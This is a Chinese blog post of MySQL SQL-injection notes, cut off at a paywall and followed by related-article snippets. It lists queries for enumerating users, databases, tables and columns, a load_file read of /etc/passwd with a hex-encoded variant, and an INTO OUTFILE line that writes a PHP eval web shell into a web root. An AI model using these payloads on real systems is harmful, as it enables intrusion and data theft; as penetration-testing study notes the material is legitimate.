mysql漏洞函数xpath_【漏洞汇总】SQL 注入漏洞之 mysql

最新推荐文章于 2023-02-04 12:37:52 发布
最新推荐文章于 2023-02-04 12:37:52 发布
阅读量524 收藏 1
点赞数
文章标签: mysql漏洞函数xpath
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35917998/article/details/113285546
版权

日期:2019-07-23 19:55:59

更新:2019-08-02 10:40:37

作者:Bay0net

介绍:Mysql 注入笔记

0x01、 基本信息

1.1 基本术语

数据库: 数据库是一些关联表的集合。

数据表: 表是数据的矩阵。在一个数据库中的表看起来像一个简单的电子表格。

列: 一列(数据元素) 包含了相同类型的数据, 例如邮政编码的数据。

行:一行(=元组,或记录)是一组相关的数据,例如一条用户订阅的数据。

主键:主键是唯一的。一个数据表中只能包含一个主键。你可以使用主键来查询数据。

外键:外键用于关联两个表。

aab82d52f49619f2a808d86f4414a7b3.png

1.2 常用命令

# 登录

mysql -h 127.0.0.1 -u root -p root

0x02、Mysql 命令

内置函数

# 查看当前数据库

select database();

# 查看用户相关

select user();

select current_user();

select system_user();

select session_user();

# 查看数据库版本

select version();

select @@version;

select @@GLOBAL.VERSION;

# 查看操作系统

select @@version_compile_os;

# 查看主机名

select @@hostname;

# 查看默认目录

select @@datadir;

查询数据库、表名、字段等信息

在每个 MySQL 实例中都有一个独立的 information_schema,用来存储 MySQL 实例中所有其他数据库的基本信息。

# 爆所有用户

select group_concat(user) from mysql.user;

# 爆所有数据库

select group_concat(SCHEMA_NAME) from information_schema.schemata;

# 爆当前数据库的表名

select group_concat(table_name) from information_schema.tables where table_schema=database();

# 表中有主码约束,非空约束等完整性约束条件的情况下 爆表名

select group_concat(table_name) from information_schema.table_constraints where table_schema=database();

# 爆字段名(表名是 users,加引号或十六进制编码)

select group_concat(column_name) from information_schema.columns where table_name='users';

select group_concat(column_name) from information_schema.columns where table_name=0x7573657273;

# 爆字段内容

select first_name,password from users

读写文件操作

# 读取文件

select load_file('/etc/passwd');

select load_file(0x2f6574632f706173737764);

load_file 的默认目录是 @@datadir。

文件需要有可读权限。

读文件的最大容量,用 @@max_allowed_packet 查看。

# 写入文件(需要有权限、知道绝对路径)

select 'hello' into outfile '/tmp/test01';

select '<?php @eval($_POST[1]);?>' into outfile '/var/www/html/shell.php';

select 'hello' into dumpfile '/tmp/test01';

outfile 和 dumpfile 都不会覆盖文件,如果文件已存在,则报错。

如果没有写权限,则报错。

into dumpfile 在写文件时会保持文件原生内容,常用来写二进制文件。

into outfile 在每一行都会加上换行符。

查看读写权限

使用 mysql 的读写功能需要具有一定的权限。

secure_file_priv 参数用来限制 load_file,into outfile 等相关读写执行函数作用于哪个指定目录。

# 查看方式

show global variables like '%secure%';

# 具体意义

当 secure_file_priv 的值为 null ,表示限制 mysqld 不允许导入|导出

当 secure_file_priv 的值为/tmp/ ,表示限制 mysqld 的导入|导出只能发生在/tmp/目录下

当 secure_file_priv 的值为/,表示限制 mysqld 的导入|导出的目录为所在的整个磁盘

当 secure_file_priv 的值没有具体值时,表示不对 mysqld 的导入|导出做限制

当 mysql.version < 5.5.53 时,默认是 null。

过滤函数使用

PHP < 5.4时;有一个 magic_quotes_gpc 配置项,当 magic_quotes is on,所有的 单引号、双引号、反斜杠和 null 都将自动使用反斜杠进行转义。在 php5.4 之后的版本不能使用这个方法进行转义。

mysql_real_escape_string(),也是用来转义特殊字符的,但是这个扩展在 php5.5 中已经弃用,并在 php7 中删除。

注释方法

符号

解释

#

注释一行

/**/

行内注释、多行注释

--

注释一行

;%00

空字节注释

`

反引号(只能在句末使用)

字符串连接</

最低0.47元/天 解锁文章
老张爱教育
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
MYSQL updatexml()函数报错注入解析
09-09
这个函数在处理XML数据时非常有用,但同时也可能成为安全漏洞的来源,特别是在没有正确过滤用户输入的情况下,可能导致SQL报错注入。 `updatexml()`函数的基本语法如下: ```sql UPDATEXML(XML_document, XPath_...
MySQL注入常用函数及逻辑运算
01-20
MySQL注入常用函数函数名称 函数功能 system_user() 系统用户名 user() 用户名 current_user() 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() 数据库版本 @@...
mysql漏洞函数xpath_SQL注入漏洞--报错注入
weixin_30045091的博客
01-28 319
报错注入报错注入在没法用union联合查询时用,但前提还是不能过滤一些关键的函数。报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。具体原理请参考:https://www.cnblogs.com/richardlee97/p/10617115.html利用函数xpath语法错误利用xpath语法错误来进行报错注入主要利用extractvalue和update...
mysql xpath注入工具_WEB安全第四篇--与数据库的亲密接触:SQL注入攻击
weixin_28849929的博客
02-17 121
零、前言最近做专心web安全有一段时间了,但是目测后面的活会有些复杂,涉及到更多的中间件、底层安全、漏洞研究与安全建设等越来越复杂的东东,所以在这里想写一个系列关于web安全基础以及一些讨巧的payload技巧以便于备忘。不是大神、博客内容非常基础,如果真的有人看而且是大牛们,请不要喷我,欢迎指正我的错误(水平有限)。一、SQL注入的本质:用户的输入与代码中的SQL语句拼接,可以构成完整的有效的可...
mysql 报错注入写文件_MySQL注入总结
weixin_33497800的博客
01-26 231
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性正文:0x00 mysql一般注入(select)1.注释符#/*--2.过滤空格注入使用/**/或()或+代替空格%0c = form fe...
Xpath注入攻击及其防御技术研究
weixin_34273046的博客
02-02 497
Xpath注入攻击及其防御技术研究 陆培军 (南通大学 计算机科学与技术学院,江苏 南通226019)     摘 要 XML技术被广泛使用,XML数据的安全性越来越重要。本文简要介绍了XPath注入攻击XML数据的原理。在前人提出的防御通用方法的基础上,提出一个XPath 注入攻击通用检验模型,模型具有普遍意义。     关键词 XPath注入攻击; 防御技术; 模型 ...
SQL注入漏洞详解
无言道的博客
03-13 1万+
文章目录SQL注入漏洞原理SQL注入内容注入条件判断注入SQL注释符与注入流程 SQL注入漏洞原理 漏洞原理   web页面源代码对用户提交的参数没有做出任何过滤限制,直接扔到SQL语句中去执行,导致特殊字符改变了SQL语句原来的功能和逻辑。黑客利用此漏洞执行恶意的SQL语句,如查询数据、下载数据,写webshell、执行系统命令以此来绕过登录权限限制等。 检测方法   可以利用sqlmap进行SQL注入的检查或利用,也可以使用其他SQL注入工具。也可以手工测,利用单引号、and 1=1以及字符型
SQL注入 报错(updatexml与extractvalue函数介绍)-01
最新发布
09-15
SQLMap是一款开源的SQL注入工具,用于自动扫描和利用SQL注入漏洞。其更新参数包括: * --purge:以安全模式删除所有SQLMap数据目录。 演示数据表介绍 在演示数据表中,我们可以看到一个名为"Whois"的表,用于存储...
mysql数据库
12-05
MySQL是一个多线程的,结构化查询语言(SQL)数据库服务器。SQL 在世界上是最流行的数据库语言。MySQL 的执行性能非常高,运行速度非常快,并非常容易使用。是一个非常棒的数据库。新的版本可以作为复杂情况以及大负荷...
sql注入漏洞
Enya1122的博客
02-04 1320
SQL注入:是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串中注入SQL指令,在设计的不良程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破化或入侵。代码层面的话,好像是这样的放一张看起来以后有用的图。
报错注入方法
u014421914的博客
01-18 182
floor() introduce: 对rand函数操作时产生错误 sql: select count(*) from information_schema.tables group by concat((select version()),floor(rand(0)*2)); sql execution return: brower url:
Only constant XPATH queries are supported
weixin_43403663的博客
11-21 693
Only constant XPATH queries are supported
怎么调取cstring left函数_Go语言函数深度解析(上)
weixin_39605414的博客
11-22 190
基本原理函数,几乎是每种编程语言的必备语法,通过函数把一系列的动作汇总起来,在不同的地方重复使用。我们在数学中曾经就使用过函数,他的形式类似于y=f(x),这就是一个完整的调用过程,y就是函数计算后得到的值,x就是传入的变量。怎么用?相信在看这个教程的人肯定已经接触过其他的编程语言,我就不多废话了,就是干。go语言中最基本的函数是这样的,以func为关键字标记函数funcfunctionPara...
sql concat函数_带你了解SQL注入基础
weixin_39628342的博客
12-01 590
sql信息安全方面一个非常重要的领域,为了学好它,还是先来简单了解下浏览器工作原理和sql注入原理吧01web浏览器相关工作原理(图片比文字能更好的帮助理解,下图)02sql注入原理将恶意的SQL代码插入到用户的输入参数的攻击,攻击者发现开发者编程过程中的漏洞,构造SQL语句,用户直接对数据库系统的内容进行直接检索或修改看完原理是不是感觉看不懂呢?学完这篇推文,相信你一定能对sql注入...
escape.alf.nu XSS Challenges 8-15 之进阶的XSS
giantbranch的专栏
05-29 7296
本文链接:http://blog.csdn.net/u012763794/article/details/51526725 上次讲了challenge 0-7 http://blog.csdn.net/u012763794/article/details/51507593,我的应该比别人的会详细一点吧,其实这需要有一定的xss的实践(自己搭环境搞个没过滤的就可以了),要熟悉js 废话不
如何求原根
热门推荐
giantbranch的专栏
01-11 2万+
说这种最好就是举个例子 比如说求81的所有原根   先说欧拉函数通式: 通式:φ(x)=x(1-1/p1)(1-1/p2)(1-1/p3)(1-1/p4)…..(1-1/pn),其中p1, p2……pn为x的所有质因数,x是不为0的整数。φ(1)=1(唯一和1互质的数(小于等于1)就是1本身)。 (注意:每种质因数只一个。比如12=2*2*3那么φ(12)=12*(1-1/2)*(1-1/...
渗透测试项目一
giantbranch的专栏
11-25 6947
实验来源:合天网安实验室:http://www.hetianlab.com/ 实验简介 实验所属系列:网络攻击与对抗实验对象:本科/专科信息安全专业相关课程及专业:信息网络安全概论、计算机网络技术、网络安全与防护实验时数(学分):4学时实验类别:实践实验类 实验场景 某互联网公司授权你对其网络安全进行模拟黑客攻击渗透。在XX年XX月XX 日至XX年XX月XX日,对某核心
windows下用pip安装paramiko------安装过程 依赖的模块pycrypto安装出了问题如何解决
giantbranch的专栏
02-23 9694
想在windows下用python玩玩ssh,结果安装paramiko是出错,见下图 当然直接  pip install pycrypto也是报错的 那就直接下载别人编译好的可执行文件安装那就行了  ,下载地址:http://www.voidspace.org.uk/python/modules.shtml#pycrypto     选择对应的版本即可,傻瓜式安装 安装完就可以im
一道综合渗透题引发的updatexml()注入思考
Grey的博客
05-09 1万+
MYSQL数据库updatexml报错注入UPDATEXML (XML_document, XPath_string, new_value); 第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc 第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。 第三个参数:new_value,String格...
sparksql中的xpath_string函数
05-19
在 Spark SQL 中,`xpath_string` 函数用于从 XML 数据中提取指定节点的文本值。它接受两个参数:XML 字符串和 XPath 表达式。 XPath 是一种用于在 XML 文档中定位节点的语言。它使用路径表达式来选择节点或节点...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值